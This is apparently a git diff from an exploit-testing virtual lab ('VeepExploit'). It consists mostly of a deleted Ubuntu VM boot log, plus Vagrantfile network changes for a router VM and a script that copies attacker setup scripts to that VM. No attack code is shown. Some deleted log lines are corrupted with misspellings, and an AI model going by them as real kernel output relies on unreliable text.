0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns -[ 4.403964] platform rtc_cmos: registered platform RTC device (no PNP device found) -[ 4.409033] Scanning for low memory corruption every 60 seconds -[ 4.425974] audit: initializing netlink subsys (disabled) -[ 4.428134] audit: type=2000 audit(1611614298.750:1): initialized -[ 4.433088] Initialise system trusted keyring -[ 4.436953] HugeTLB registered 2 MB page size, pre-allocated 0 pages -[ 4.441108] zbud: loaded -[ 4.445877] VFS: Disk quotas dquot_6.6.0 -[ 4.447363] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) -[ 4.449241] squashfs: version 4.0 (2009/01/31) Phillip Lougher -[ 4.454243] fuse init (API version 7.23) -[ 4.455304] Key type big_key registered -[ 4.456257] Allocating IMA MOK and blacklist keyrings. -[ 4.458513] Key type asymmetric registered -[ 4.459469] Asymmetric key parser 'x509' registered -[ 4.466550] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) -[ 4.479287] io scheduler noop registered -[ 4.482195] io scheduler deadline registered (default) -[ 4.484788] io scheduler cfq registered -[ 4.486645] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 -[ 4.494527] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 -[ 4.496170] ACPI: AC Adapter [AC] (on-line) -[ 4.497288] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 -[ 4.500739] ACPI: Power Button [PWRF] -[ 4.501829] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 -[ 4.505271] ACPI: Sleep Button [SLPF] -[ 4.511448] ACPI: Battery Slot [BAT0] (battery present) -[ 4.515689] GHES: HEST is not enabled! -[ 4.518457] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled -[ 4.555857] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A -[ 4.561626] Linux agpgart interface v0.103 -[ 4.572806] loop: module loaded -[ 4.575901] scsi host0: ata_piix -[ 4.577097] scsi host1: ata_piix -[ 4.577994] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 -[ 4.581135] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 -[ 4.585122] libphy: Fixed MDIO Bus: probed -[ 4.586197] tun: Universal TUN/TAP device driver, 1.6 -[ 4.587497] tun: (C) 1999-2004 Max Krasnyansky -[ 4.595111] PPP generic driver version 2.4.2 -[ 4.597970] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver -[ 4.599428] ehci-pci: EHCI PCI platform driver -[ 4.600571] ehci-platform: EHCI generic platform driver -[ 4.612616] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver -[ 4.615275] ohci-pci: OHCI PCI platform driver -[ 4.616441] ohci-platform: OHCI generic platform driver -[ 4.619221] uhci_hcd: USB Universal Host Controller Interface driver -[ 4.628431] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 -[ 4.635199] serio: i8042 KBD port at 0x60,0x64 irq 1 -[ 4.636496] serio: i8042 AUX port at 0x60,0x64 irq 12 -[ 4.637808] mousedev: PS/2 mouse device common for all mice -[ 4.653843] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 -[ 4.657260] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram -[ 4.660214] i2c /dev entries driver -[ 4.661236] device-mapper: uevent: version 1.0.3 -[ 4.663023] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com -[ 4.663400] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 -[ 4.672730] ledtrig-cpu: registered to indicate activity on CPUs -[ 4.680974] NET: Registered protocol family 10 -[ 4.684563] NET: Registered protocol family 17 -[ 4.692588] Key type dns_resolver registered -[ 4.697287] registered taskstats version 1 -[ 4.700838] Loading compiled-in X.509 certificates -[ 4.704698] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' -[ 4.711078] zswap: loaded using pool lzo/zbud -[ 4.720481] Key type trusted registered -[ 4.726988] Key type encrypted registered -[ 4.728017] AppArmor: AppArmor sha1 policy hashing enabled -[ 4.729432] ima: No TPM chip found, activating TPM-bypass! -[ 4.736774] ima: Allocated hash algorithm: sha1 -[ 4.737854] evm: HMAC attrs: 0x1 -[ 4.739076] Magic number: 5:763:654 -[ 4.740061] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:16 UTC (1611614296) -[ 4.742112] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found -[ 4.743414] EDD information not available. -[ 4.749948] Freeing unused kernel memory: 1492K -[ 4.764377] Write protecting the kernel read-only data: 14336k -[ 4.772691] Freeing unused kernel memory: 1592K -[ 4.776924] Freeing unused kernel memory: 56K -Loading, please wait... -starting version 229 -[ 4.829923] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.831901] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.831931] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.836995] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.840469] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.867693] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.870960] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.873259] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.873363] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 4.873424] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) -[ 5.015050] Fusion MPT base driver 3.04.20 -[ 5.031892] Copyright (c) 1999-2008 LSI Corporation -[ 5.054803] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI -[ 5.068173] e1000: Copyright (c) 1999-2006 Intel Corporation. -[ 5.085438] Fusion MPT SPI Host driver 3.04.20 -[ 5.183111] AVX2 version of gcm_enc/dec engaged. -[ 5.216545] AES CTR mode by8 optimization enabled -[ 5.307990] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 -[ 5.741928] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff -[ 5.747242] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection -[ 5.761616] mptbase: ioc0: Initiating bringup -[ 5.831678] ioc0: LSI53C1030 A0: Capabilities={Initiator} -[ 6.017013] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 -[ 6.129423] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.144482] scsi target2:0:0: Beginning Domain Validation -[ 6.147535] scsi target2:0:0: Domain Validation skipping write tests -[ 6.149879] scsi target2:0:0: Ending Domain Validation -[ 6.152473] scsi target2:0:0: asynchronous -[ 6.160806] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 -[ 6.164889] scsi target2:0:1: Beginning Domain Validation -[ 6.179042] scsi target2:0:1: Domain Validation skipping write tests -[ 6.182848] scsi target2:0:1: Ending Domain Validation -[ 6.187245] scsi target2:0:1: asynchronous -[ 6.207956] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) -[ 6.214533] sd 2:0:0:0: Attached scsi generic sg0 type 0 -[ 6.223454] sd 2:0:0:0: [sda] Write Protect is off -[ 6.227923] sd 2:0:0:0: [sda] Incomplete mode parameter data -[ 6.230658] sd 2:0:0:0: [sda] Assuming drive cache: write through -[ 6.239064] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) -[ 6.243886] sd 2:0:1:0: Attached scsi generic sg1 type 0 -[ 6.249730] sd 2:0:1:0: [sdb] Write Protect is off -[ 6.252882] sd 2:0:1:0: [sdb] Incomplete mode parameter data -[ 6.255818] sd 2:0:1:0: [sdb] Assuming drive cache: write through -[ 6.263222] sda: sda1 -[ 6.265703] sd 2:0:0:0: [sda] Attached SCSI disk -[ 6.273351] sd 2:0:1:0: [sdb] Attached SCSI disk -[ 6.596178] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:4a:48:46 -[ 6.607624] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection -[ 7.047884] e1000 0000:00:09.0 eth2: (PCI:33MHz:32-bit) 08:00:27:0a:3f:27 -[ 7.050079] e1000 0000:00:09.0 eth2: Intel(R) PRO/1000 Network Connection -[ 7.077469] e1000 0000:00:08.0 enp0s8: renamed from eth1 -[ 7.108201] e1000 0000:00:03.0 enp0s3: renamed from eth0 -[ 7.318261] e1000 0000:00:09.0 enp0s9: renamed from eth2 -Begin: Loading e[ 8.933114] md: linear personality registered for level -1 -ssential drivers ... [ 8.965543] md: multipath personality registered for level -4 -[ 8.974078] md: raid0 personality registered for level 0 -[ 8.986893] md: raid1 personality registered for level 1 -[ 9.067507] raid6: sse2x1 gen() 5791 MB/s -[ 9.138439] raid6: sse2x1 xor() 4668 MB/s -[ 9.207974] raid6: sse2x2 gen() 7813 MB/s -[ 9.275459] raid6: sse2x2 xor() 5497 MB/s -[ 9.359472] raid6: sse2x4 gen() 11602 MB/s -[ 9.427463] raid6: sse2x4 xor() 6950 MB/s -[ 9.523457] raid6: avx2x1 gen() 12830 MB/s -[ 9.591455] raid6: avx2x2 gen() 15248 MB/s -[ 9.659458] raid6: avx2x4 gen() 23384 MB/s -[ 9.660596] raid6: using algorithm avx2x4 gen() 23384 MB/s -[ 9.661882] raid6: using avx2x2 recovery algorithm -[ 9.674338] xor: automatically using best checksumming function: -[ 9.719458] avx : 18383.000 MB/sec -[ 9.726420] async_tx: api initialized (async) -[ 9.772115] md: raid6 personality registered for level 6 -[ 9.777442] md: raid5 personality registered for level 5 -[ 9.784930] md: raid4 personality registered for level 4 -[ 9.815670] md: raid10 personality registered for level 10 -done. -Begin: Running /scripts/init-premount ... done. -Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. -Begin: Running /scripts/local-premount ... [ 9.934468] Btrfs loaded -Scanning for Btrfs filesystems -done. -Warning: fsck not present, so skipping root file system -[ 9.999883] EXT4-fs (sda1): INFO: recovery required on readonly filesystem -[ 10.047957] EXT4-fs (sda1): write access will be enabled during recovery -[ 10.091868] EXT4-fs (sda1): recovery complete -[ 10.411204] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) -done. -Begin: Running /scripts/local-bottom ... done. -Begin: Running /scripts/init-bottom ... done. -[ 10.615690] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) -[ 10.630704] systemd[1]: Detected virtualization oracle. -[ 10.637884] systemd[1]: Detected architecture x86-64. - -Welcome to Ubuntu 16.04.7 LTS! - -[ 10.661335] systemd[1]: Set hostname to . -[ 10.979032] systemd[1]: Reached target System Time Synchronized. -[ 10.980607] random: nonblocking pool is initialized -[ OK ] Reached target System Time Synchronized. -[ 11.058363] systemd[1]: Listening on udev Control Socket. -[ OK ] Listening on udev Control Socket. -[ 11.330368] systemd[1]: Listening on Journal Audit Socket. -[ OK ] Listening on Journal Audit Socket. -[ 11.406290] systemd[1]: Set up automount Arbitrary Excutable File Formats File System Automount Point. -[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. -[ 11.489790] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. -[ OK ] Listening on /dev/initctl Compatibility Named Pipe. -[ 11.501103] systemd[1]: Listening on Device-mapper event daemon FIFOs. -[ OK ] Listening on Device-mapper event daemon FIFOs. -[ 11.508454] systemd[1]: Reached target Encrypted Volumes. -[ OK ] Reached target Encrypted Volumes. -[ 11.517344] systemd[1]: Reached target Swap. -[ OK ] Reached target Swap. -[ 11.523293] systemd[1]: Listening on LVM2 poll daemon socket. -[ OK ] Listening on LVM2 poll daemon socket. -[ 11.532166] systemd[1]: Created slice System Slice. -[ OK ] Created slice System Slice. -[ 11.541134] systemd[1]: Created slice system-serial\x2dgetty.slice. -[ OK ] Created slice system-serial\x2dgetty.slice. -[ 11.548290] systemd[1]: Reached target User and Group Name Lookups. -[ OK ] Reached target User and Group Name Lookups. -[ 11.556476] systemd[1]: Started Forward Password Requests to Wall Directory Watch. -[ OK ] Started Forward Password Requests to Wall Directory Watch. -[ 11.567709] systemd[1]: Listening on Journal Socket. -[ OK ] Listening on Journal Socket. - -[ 11.600394] systemd[1]: Mounting Huge Pages File System... - Mounting Huge Pages File System... -[ 11.633977] systemd[1]: Starting Nameserver information manager... - Starting Nameserver information manager... -[ 11.650651] systemd[1]: Starting Remount Root and Kernel File Systems... - Starting Remount[ 11.658858] EXT4-fs (sda1): re-mounted. Opts: (null) - Root and Kernel File Systems... -[ 11.672247] systemd[1]: Starting Load Kernel Modules... - Starting Load Kernel Modules... -[ 11.685124] systemd[1]: Listening on LVM2 metadata daemon socket. -[ OK ] Listening on LVM2 metadata daemon socket. -[ 11.707119] Loading iSCSI transport class v2.0-870. -[ 11.719712] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... - Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... -[ 11.729679] systemd[1]: Listening on Journal Socket (/dev/log). -[ OK ] Listening on Journal Socket (/dev/log). -[ 11.742255] systemd[1]: Started Trigger resolvconf update for networkd DNS. -[ OK ] Started Trigger resolvconf update for networkd DNS. -[ 11.766365] systemd[1]: Created slice User and Session Slice. -[ OK ] Created slice User and Session Slice. -[ 11.787339] systemd[1]: Starting Set console keymap... - Starting Set console keymap... -[ 11.797722] systemd[1]: Listening on udev Kernel Socket. -[ OK ] Listening on udev Kernel Sock[ 11.815538] iscsi: registered transport (tcp) -et. -[ 11.876125] systemd[1]: Starting Create list of required static device nodes for the current kernel... - Starting Create list of required st... nodes for the current kernel... -[ 11.947592] systemd[1]: Mounting POSIX Message Queue File System... - Mounting POSIX Message Queue File System... -[ 12.032343] systemd[1]: Mounting Debug File System... - Mounting Debug File System... -[ 12.054479] systemd[1]: Reached target Slices. -[ OK ] Reached target Slices. -[ 12.081271] systemd[1]: Listening on Syslog Socket. -[ OK ] Listening on Syslog Socket. -[ 12.105598] systemd[1]: Starting Journal Service... - Starting Journal Service... -[ 12.126931] systemd[1]: Starting Uncomplicated firewall... - Starting Uncomplicated firewall... -[ 12.150485] systemd[1]: Mounted Debug File System. -[ OK ] Mounted Debug File System. -[ 12.199885] systemd[1]: Mounted Huge Pages File System. -[ OK ] Mounted Huge Pages File System. -[ 12.218257] systemd[1]: Mounted POSIX Message Queue File System. -[ OK ] Mounted POSIX Message Queue [ 12.233578] iscsi: registered transport (iser) -File System. -[ 12.263788] systemd[1]: Started Journal Service. -[ OK ] Started Journal Service. -[ OK ] Started Remount Root and Kernel File Systems. -[ OK ] Started Load Kernel Modules. -[ OK ] Started Set console keymap. -[ OK ] Started Create list of required sta...ce nodes for the current kernel. -[ OK ] Started Uncomplicated firewall. -[ OK ] Started Nameserver information manager. -[ OK ] Started LVM2 metadata daemon. - Starting Create Static Device Nodes in /dev... - Mounting FUSE Control File System... - Starting Apply Kernel Variables... - Starting udev Coldplug all Devices... - Starting Load/Save Random Seed... - Starting Flush Journal to Persistent Storage... -[ OK ] Mounted FUSE Control File System. -[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. -[ OK ] Started Create Static Device Nodes in /dev. -[ OK ] Started Apply Kernel Variables. -[ OK ] Started Load/Save Random Seed. - Starting udev Kernel Device Manager... -[ OK ] Reached target Local File Systems (Pre). -[ OK ] Reached target Local File Systems. - Starting netfilter persistent configuration... - Starting Set console font and keymap... - Starting Initial cloud-init job (pre-networking)... - Starting LSB: AppArmor initialization... - Starting Tell Plymouth To Write Out Runtime Data... -[ OK ] Started udev Kernel Device Manager. -[ OK ] Started udev Coldplug all Devices. -[ OK ] Started netfilter persistent configuration. -[ OK ] Started Tell Plymouth To Write Out Runtime Data. -[ OK ] Started Flush Journal to Persistent Storage. -[ OK ] Found device /dev/ttyS0. -[ OK ] Started LSB: AppArmor initialization. -[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. - Starting Load AppArmor profiles managed internally by snapd... - Starting Create Volatile Files and Directories... -[ OK ] Started Dispatch Password Requests to Console Directory Watch. -[ OK ] Started Set console font and keymap. -[ OK ] Started Load AppArmor profiles managed internally by snapd. -[ OK ] Started Create Volatile Files and Directories. -[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). -[ 15.084016] cloud-init[494]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:27 +0000. Up 13.40 seconds. - Starting Update UTMP about System Boot/Shutdown... -[ OK ] Created slice system-getty.slice. -[ OK ] Started Update UTMP about System Boot/Shutdown. -[ OK ] Started Initial cloud-init job (pre-networking). -[ OK ] Reached target Network (Pre). -[ OK ] Started ifup for enp0s3. - Starting Raise network interfaces... -[ OK ] Started ifup for enp0s8. -[ OK ] Started ifup for enp0s9. -[FAILED] Failed to start Raise network interfaces. -See 'systemctl status networking.service' for details. - Starting Initial cloud-init job (metadata service crawler)... -[ OK ] Reached target Network. -[ 19.313234] cloud-init[1172]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:32 +0000. Up 18.29 seconds. -[ 19.348770] cloud-init[1172]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ -[ 19.416316] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.525104] cloud-init[1172]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 19.658694] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.805209] cloud-init[1172]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | -[ OK [ 19.812482] cloud-init[1172]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 19.813618] cloud-init[1172]: ci-info: | enp0s8 | True | 192.168.1.2 | 255.255.255.0 | global | 08:00:27:4a:48:46 | -[ 19.813762] cloud-init[1172]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe4a:4846/64 | . | link | 08:00:27:4a:48:46 | -[ 19.813878] cloud-init[1172]: ci-info: | enp0s9 | True | 172.16.4.254 | 255.255.255.0 | global | 08:00:27:0a:3f:27 | -[ 19.813994] cloud-init[1172]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe0a:3f27/64 | . | link | 08:00:27:0a:3f:27 | -[ 19.814109] cloud-init[1172]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 19.814220] cloud-init[1172]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 19.814345] cloud-init[1172]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ -[ 19.814584] cloud-init[1172]: ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++ -[ 19.814799] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.814916] cloud-init[1172]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | -[ 19.815031] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.815156] cloud-init[1172]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 19.815269] cloud-init[1172]: ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 19.815401] cloud-init[1172]: ci-info: | 2 | 172.16.4.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | -[ 19.815568] cloud-init[1172]: ci-info: | 3 | 192.168.0.0 | 192.168.1.254 | 255.255.0.0 | enp0s8 | UG | -[ 19.815665] cloud-init[1172]: ci-info: | 4 | 192.168.1.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 19.815816] cloud-init[1172]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ -[ 19.815942] cloud-init[1172]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 19.816032] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.816118] cloud-init[1172]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 19.816207] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 19.816293] cloud-init[1172]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | -] Started Initial cloud-init job (metadata service crawler). -[ OK ] Reached target System Initialization. -[ 19.816523] cloud-init[1172]: ci-info: | 1 | fe80::/64 | :: | enp0s9 | U | -[ 21.496335] cloud-init[1172]: ci-info: | 2 | fe80::/64 | :: | enp0s3 | U | -[ OK [ 21.548310] cloud-init[1172]: ci-info: | 8 | ff00::/8 | :: | enp0s8 | U | -[ 21.549847] cloud-init[1172]: ci-info: | 9 | ff00::/8 | :: | enp0s9 | U | -[ 21.551607] cloud-init[1172]: ] Started ACPI Events Check. -[ OK ] Reached target Paths. -ci-info: | 10 | ff00::/8 | :: | enp0s3 | U |[ OK ] Started Message of the Day. -[ OK ] Listening on ACPID Listen Socket. -[ OK ] Started Daily Cleanup of Temporary Directories. -[ OK ] Started Daily apt download activities. - Starting LXD - unix socket. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Started Daily apt upgrade and clean activities. -[ OK ] Reached target Timers. -[ OK ] Listening on D-Bus System Message Bus Socket. - Starting Socket activation for snappy daemon. -[ OK ] Reached target Network is Online. - -[ 21.696503] cloud-init[1172]: ci-info: +-------+-------------+---------+-----------+-------+ - Starting iSCSI initiator daemon (iscsid)... -[ OK ] Reached target Cloud-config availability. -[ OK ] Listening on LXD - unix socket. -[ OK ] Listening on Socket activation for snappy daemon. -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. - Starting Accounts Service... - Starting System Logging Service... -[ OK ] Started FUSE filesystem for LXC. -[ OK ] Started ACPI event daemon. -[ OK ] Started Deferred execution scheduler. - Starting Virtualbox guest utils... -[ OK ] Started D-Bus System Message Bus. - Starting Snap Daemon... - Starting OpenBSD Secure Shell server... - Starting /etc/rc.local Compatibility... - Starting LSB: Record successful boot for GRUB... - Starting LSB: MD monitoring daemon... - Starting Login Service... -[ OK ] Started Regular background program processing daemon. - Starting LXD - container startup/shutdown... -[ OK ] Started System Logging Service. -[ OK ] Started iSCSI initiator daemon (iscsid). -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started OpenBSD Secure Shell server. - Starting Authenticate and Authorize Users to Run Privileged Tasks... - Starting Login to default iSCSI targets... -[ OK ] Started Snap Daemon. -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Login Service. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Accounts Service. -[ OK ] Started Unattended Upgrades Shutdown. - Starting Wait until snapd is fully seeded... -[ OK ] Started Login to default iSCSI targets. -[ OK ] Started Wait until snapd is fully seeded. - Starting Apply the settings specified in cloud-config... -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting LSB: daemon to balance interrupts for SMP systems... - Starting LSB: automatic crash report generation... - Starting Permit User Sessions... - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... -[ OK ] Started Permit User Sessions. - Starting Terminate Plymouth Boot Screen... - Starting Hold until boot process finishes up... -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started Terminate Plymouth Boot Screen. -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Started Getty on tty1. -[ OK ] Reached target Login Prompts. - Starting Set console scheme... -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Set console scheme. -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 24.088246] cloud-init[1374]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:37 +0000. Up 23.51 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 26.187607] cloud-init[1441]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:39 +0000. Up 25.85 seconds. -[ 26.291171] cloud-init[1441]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 26.13 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS vague-gateway ttyS0 - -vague-gateway login: \ No newline at end of file diff --git a/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd deleted file mode 100644 index a838a87..0000000 --- a/virtual-test-environment/routers/router1/.vagrant/machines/default/virtualbox/vagrant_cwd +++ /dev/null @@ -1 +0,0 @@ -/home/jive/space/gittin/VeepExploit/virt-lab/routers/router1 \ No newline at end of file diff --git a/virtual-test-environment/routers/router1/Vagrantfile b/virtual-test-environment/routers/router1/Vagrantfile index 84ceea3..fb5303f 100644 --- a/virtual-test-environment/routers/router1/Vagrantfile +++ b/virtual-test-environment/routers/router1/Vagrantfile @@ -1,5 +1,4 @@ # -*- mode: ruby -*- - # vi: set ft=ruby : Vagrant.configure(2) do |config| @@ -8,8 +7,11 @@ Vagrant.configure(2) do |config| config.vm.network "forwarded_port", guest: 22, host: 22114, id: 'ssh' config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.1.254", virtualbox__intnet: "intnet-1" + config.vm.network "private_network", ip: "192.168.100.1", virtualbox__intnet: "intnet-100" + config.vm.network "private_network", ip: "192.168.101.2", virtualbox__intnet: "intnet-101" config.vm.provider "virtualbox" do |vb| diff --git a/virtual-test-environment/routers/router1/copy_attacker_setup.sh b/virtual-test-environment/routers/router1/copy_attacker_setup.sh index 7b5aad4..648d81b 100755 --- a/virtual-test-environment/routers/router1/copy_attacker_setup.sh +++ b/virtual-test-environment/routers/router1/copy_attacker_setup.sh @@ -5,7 +5,7 @@ echo Copying attacker setup scripts to router1 VM.. -scp -i .vagrant/machines/default/virtualbox/private_key -P 22114 ../../edgers/setups/attacker/* vagrant@localhost:~ +scp -i .vagrant/machines/default/virtualbox/private_key -P 22114 ../../edgers/setups/attacker/setup_attacker* vagrant@localhost:~ diff --git a/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log deleted file mode 100644 index b68a835..0000000 --- a/virtual-test-environment/routers/router1/ubuntu-xenial-16.04-cloudimg-console.log +++ /dev/null @@ -1,666 +0,0 @@ -[ 0.00000 Initializing cgroup subsys cpuset -[ 0.000000] Initializing cgroup subsys cpu -[ 0.000000] Initializing cgroup subsys cpuacct -[ 0.00000] Linux vrsion 4.4.0-190-generic (buldd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubunu 5.4.0-6ubuntu1~16.0.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) -[ 0.000000] Command line: BOOT_IMAGE=/boot/vmmlinz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 -[ 0.000000] KERNEL supported cpus: -[ 0.000000] Intel GenuineIntel -[ 0.000000] AMD AuthenticAMD -[ 0.000000] Centaur CentaurHauls -[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2] 256 [ 0.000000 x86/fp: Supporting XSAVE feature 0x01: 'x87 flating point registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' -[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' -[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. -[ 0.000000] e820: BIOS-provided physical RAM map: -[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable -[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved -[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved -[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable -[ 0.000000] BIOS-e820: [mem 0x00000003fff000-0x000000003fffffff] ACPI data -[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-x00000000fec00fff] reserved -[ 0.000000] BIOS-e820: [m 0x00000000fee00000-0x00000000fee00fff] reserved -[ 0.000000] BOS-e820: [mem 